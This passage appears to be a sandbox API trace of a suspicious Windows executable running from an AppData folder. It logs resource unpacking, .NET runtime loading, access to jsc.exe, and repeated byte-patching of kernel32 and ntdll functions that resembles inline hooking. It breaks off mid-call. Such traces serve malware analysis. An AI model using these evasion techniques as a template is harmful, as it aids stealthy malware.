dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÍ=H§\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0100.273] GetLastError () returned 0x0 [0100.274] SetLastError (dwErrCode=0x0) [0100.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꓺԺJĀ") returned 256 [0100.274] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꓺԺJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0100.274] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꓺԺJĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0100.274] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÍ=H§\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0100.274] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49c704) returned 0x0 [0100.274] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x262bd0) returned 0x80 [0100.301] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0100.301] FindResourceW (hModule=0x400000, lpName=0x3e8, lpType=0xa) returned 0x541058 [0100.301] SizeofResource (hModule=0x400000, hResInfo=0x541058) returned 0x93400 [0100.301] VirtualAlloc (lpAddress=0x0, dwSize=0x93400, flAllocationType=0x3000, flProtect=0x4) returned 0x280000 [0100.302] LoadResource (hModule=0x400000, hResInfo=0x541058) returned 0x4a90e8 [0100.314] VirtualAlloc (lpAddress=0x0, dwSize=0x9a000, flAllocationType=0x3000, flProtect=0x4) returned 0x1d90000 [0100.371] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x0 [0100.371] LoadLibraryA (lpLibFileName="mscoree.dll") returned 0x754f0000 [0100.400] GetProcAddress (hModule=0x754f0000, lpProcName="_CorExeMain") returned 0x754f4ddb [0100.400] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0100.400] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18fee8 | out: lpflOldProtect=0x18fee8*=0x40) returned 1 [0100.401] VirtualAlloc (lpAddress=0x0, dwSize=0x9a000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f10000 [0100.460] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x754f0000 [0100.460] GetProcAddress (hModule=0x754f0000, lpProcName="_CorExeMain") returned 0x754f4ddb [0100.460] VirtualProtect (in: lpAddress=0x1f12000, dwSize=0x928d4, flNewProtect=0x4, lpflOldProtect=0x18f974 | out: lpflOldProtect=0x18f974*=0x40) returned 1 [0100.462] VirtualProtect (in: lpAddress=0x1f12000, dwSize=0x928d4, flNewProtect=0x40, lpflOldProtect=0x18f974 | out: lpflOldProtect=0x18f974*=0x4) returned 1 [0100.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f99c | out: phkResult=0x18f99c*=0x64) returned 0x0 [0100.473] RegQueryValueExW (in: hKey=0x64, lpValueName="InstallRoot", lpReserved=0x0, lpType=0x18f990, lpData=0x18f788, lpcbData=0x18f994*=0x104 | out: lpType=0x18f990*=0x1, lpData="C:\\Windows\\Microsoft.NET\\Framework\\", lpcbData=0x18f994*=0x48) returned 0x0 [0100.473] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x4a8000, cbMultiByte=-1, lpWideCharStr=0x18f580, cchWideChar=260 | out: lpWideCharStr="v4.0.30319") returned 11 [0100.473] RegCloseKey (hKey=0x64) returned 0x0 [0100.473] PathFileExistsW (pszPath="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\") returned 1 [0100.473] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorwks.dll") returned 0x0 [0100.474] LoadLibraryW (lpLibFileName="mscorwks.dll") returned 0x0 [0100.527] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sxs.dll") returned 0x0 [0100.527] LoadLibraryW (lpLibFileName="sxs.dll") returned 0x75490000 [0100.531] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\shfolder.dll") returned 0x0 [0100.531] LoadLibraryW (lpLibFileName="shfolder.dll") returned 0x75480000 [0100.537] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\user32.dll") returned 0x0 [0100.570] LoadLibraryW (lpLibFileName="user32.dll") returned 0x770d0000 [0100.570] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\iphlpapi.dll") returned 0x0 [0100.571] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x75460000 [0100.586] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\advapi32.dll") returned 0x0 [0100.586] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75cf0000 [0100.587] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Gdiplus.dll") returned 0x0 [0100.587] LoadLibraryW (lpLibFileName="Gdiplus.dll") returned 0x752c0000 [0101.622] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll") returned 0x0 [0101.624] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x75f10000 [0101.624] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll") returned 0x751e0000 [0103.470] LoadLibraryW (lpLibFileName="diasymreader.dll") returned 0x751e0000 [0103.470] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll") returned 0x0 [0103.471] LoadLibraryW (lpLibFileName="mscoree.dll") returned 0x754f0000 [0103.471] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsec.dll") returned 0x0 [0103.471] LoadLibraryW (lpLibFileName="mscorsec.dll") returned 0x0 [0103.473] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscordacwks.dll") returned 0x74de0000 [0104.240] LoadLibraryW (lpLibFileName="mscordacwks.dll") returned 0x74de0000 [0104.241] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Culture.dll") returned 0x750d0000 [0105.391] LoadLibraryW (lpLibFileName="Culture.dll") returned 0x750d0000 [0105.391] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorjit.dll") returned 0x0 [0105.391] LoadLibraryW (lpLibFileName="mscorjit.dll") returned 0x0 [0105.393] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll") returned 0x74d80000 [0105.424] LoadLibraryW (lpLibFileName="mscorrc.dll") returned 0x74d80000 [0105.424] PathFileExistsW (pszPath="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe") returned 1 [0105.425] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\jsc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0105.425] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb490 [0105.426] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a6ad0, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0105.426] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a6cd8, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0105.426] GetModuleHandleA (lpModuleName="kernel32") returned 0x75b90000 [0105.426] GetProcAddress (hModule=0x75b90000, lpProcName="GetModuleHandleA") returned 0x75ba1245 [0105.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa) returned 0x262e80 [0105.426] VirtualProtect (in: lpAddress=0x262e80, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x4) returned 1 [0105.427] VirtualProtect (in: lpAddress=0x75ba1245, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x20) returned 1 [0105.427] VirtualProtect (in: lpAddress=0x75ba1245, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x40) returned 1 [0105.838] GetCurrentProcess () returned 0xffffffff [0105.838] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba1245, dwSize=0x5) returned 1 [0105.838] GetModuleHandleA (lpModuleName="kernel32") returned 0x75b90000 [0105.839] GetProcAddress (hModule=0x75b90000, lpProcName="GetModuleHandleW") returned 0x75ba34b0 [0105.839] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa) returned 0x262e98 [0105.839] VirtualProtect (in: lpAddress=0x262e98, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x40) returned 1 [0105.839] VirtualProtect (in: lpAddress=0x75ba34b0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x20) returned 1 [0105.840] VirtualProtect (in: lpAddress=0x75ba34b0, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x40) returned 1 [0105.895] GetCurrentProcess () returned 0xffffffff [0105.895] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba34b0, dwSize=0x5) returned 1 [0105.895] GetModuleHandleA (lpModuleName="kernel32") returned 0x75b90000 [0105.896] GetProcAddress (hModule=0x75b90000, lpProcName="GetModuleFileNameW") returned 0x75ba4950 [0105.896] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa) returned 0x262eb0 [0105.896] VirtualProtect (in: lpAddress=0x262eb0, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x40) returned 1 [0105.897] VirtualProtect (in: lpAddress=0x75ba4950, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x20) returned 1 [0105.897] VirtualProtect (in: lpAddress=0x75ba4950, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x40) returned 1 [0105.917] GetCurrentProcess () returned 0xffffffff [0105.917] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba4950, dwSize=0x5) returned 1 [0105.917] GetModuleHandleA (lpModuleName="kernel32") returned 0x75b90000 [0105.917] GetProcAddress (hModule=0x75b90000, lpProcName="GetModuleFileNameA") returned 0x75ba14b1 [0105.917] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa) returned 0x262ec8 [0105.917] VirtualProtect (in: lpAddress=0x262ec8, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x40) returned 1 [0105.918] VirtualProtect (in: lpAddress=0x75ba14b1, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x20) returned 1 [0105.919] VirtualProtect (in: lpAddress=0x75ba14b1, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x40) returned 1 [0105.986] GetCurrentProcess () returned 0xffffffff [0105.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba14b1, dwSize=0x5) returned 1 [0105.987] GetModuleHandleA (lpModuleName="ntdll") returned 0x77bb0000 [0105.989] GetProcAddress (hModule=0x77bb0000, lpProcName="ZwCreateSection") returned 0x77bcff94 [0105.989] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa) returned 0x262ee0 [0105.990] VirtualProtect (in: lpAddress=0x262ee0, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f880 | out: lpflOldProtect=0x18f880*=0x40) returned 1 [0105.992] VirtualProtect (in: lpAddress=0x77bcff94, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f880 | out: lpflOldProtect=0x18f880*=0x20) returned 1 [0105.993] VirtualProtect (in: lpAddress=0x77bcff94, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f880 | out: lpflOldProtect=0x18f880*=0x40) returned 1 [0106.892] GetCurrentProcess () returned 0xffffffff [0106.892] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x77bcff94, dwSize=0x5) returned 1 [0106.892] GetModuleHandleA (lpModuleName="kernel32") returned 0x75b90000 [0106.892] GetProcAddress (hModule=0x75b90000, lpProcName="CreateFileW") returned 0x75ba3f5c [0106.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa) returned 0x262ef8 [0106.899] VirtualProtect (in: lpAddress=0x262ef8, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f874 | out: lpflOldProtect=0x18f874*=0x40) returned 1 [0106.900] VirtualProtect (in: lpAddress=0x75ba3f5c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f874 | out: lpflOldProtect=0x18f874*=0x20) returned 1 [0106.901] VirtualProtect (in: lpAddress=0x75ba3f5c, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f874 | out: lpflOldProtect=0x18f874*=0x40) returned 1 [0106.924] GetCurrentProcess () returned 0xffffffff [0106.924] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba3f5c, dwSize=0x5) returned 1 [0106.924] GetModuleHandleA (lpModuleName="kernel32") returned 0x75b90000 [0106.925] GetProcAddress (hModule=0x75b90000, lpProcName="GetFileSize") returned 0x75ba196e [0106.925] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa) returned 0x262f10 [0106.925] VirtualProtect (in: lpAddress=0x262f10, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x40) returned 1 [0106.925] VirtualProtect (in: lpAddress=0x75ba196e, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x20) returned 1 [0106.926] VirtualProtect (in: lpAddress=0x75ba196e, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x40) returned 1 [0107.058] GetCurrentProcess () returned 0xffffffff [0107.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba196e, dwSize=0x5) returned 1 [0107.058] GetModuleHandleA (lpModuleName="kernel32") returned 0x75b90000 [0107.058] GetProcAddress (hModule=0x75b90000, lpProcName="MapViewOfFile") returned 0x75ba18f1 [0107.058] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa) returned 0x262f28 [0107.059] VirtualProtect (in: lpAddress=0x262f28, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x40) returned 1 [0107.060] VirtualProtect (in: lpAddress=0x75ba18f1, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x20) returned 1 [0107.060] VirtualProtect (in: lpAddress=0x75ba18f1, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x40) returned 1 [0107.087] GetCurrentProcess () returned 0xffffffff [0107.087] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba18f1, dwSize=0x5) returned 1 [0107.087] GetModuleHandleA (lpModuleName="kernel32") returned 0x75b90000 [0107.088] GetProcAddress (hModule=0x75b90000, lpProcName="LoadLibraryExW") returned 0x75ba495d [0107.088] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa) returned 0x262f40 [0107.088] VirtualProtect (in: lpAddress=0x262f40, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x40) returned 1 [0107.093] VirtualProtect (in: lpAddress=0x75ba495d, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x20) returned 1 [0107.094] VirtualProtect (in: lpAddress=0x75ba495d, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x40) returned 1 [0107.150] GetCurrentProcess () returned 0xffffffff [0107.150] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba495d, dwSize=0x5) returned 1 [0107.150] GetModuleHandleA (lpModuleName="kernel32") returned 0x75b90000 [0107.150] GetProcAddress (hModule=0x75b90000, lpProcName="CloseHandle") returned 0x75ba1410 [0107.150] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa) returned 0x262f58 [0107.150] VirtualProtect (in: lpAddress=0x262f58, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x40) returned 1 [0107.159] VirtualProtect (in: lpAddress=0x75ba1410, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x20) returned 1 [0107.160] VirtualProtect (in: lpAddress=0x75ba1410, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x40) returned 1 [0107.203] GetCurrentProcess () returned 0xffffffff [0107.203] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba1410, dwSize=0x5) returned 1 [0107.285] GetCurrentProcess () returned 0xffffffff [0107.285] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18e09c, cb=0x1000, lpcbNeeded=0x18f2b0 | out: lphModule=0x18e09c, lpcbNeeded=0x18f2b0) returned 1 [0107.286] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.286] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.286] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.286] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.287] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, 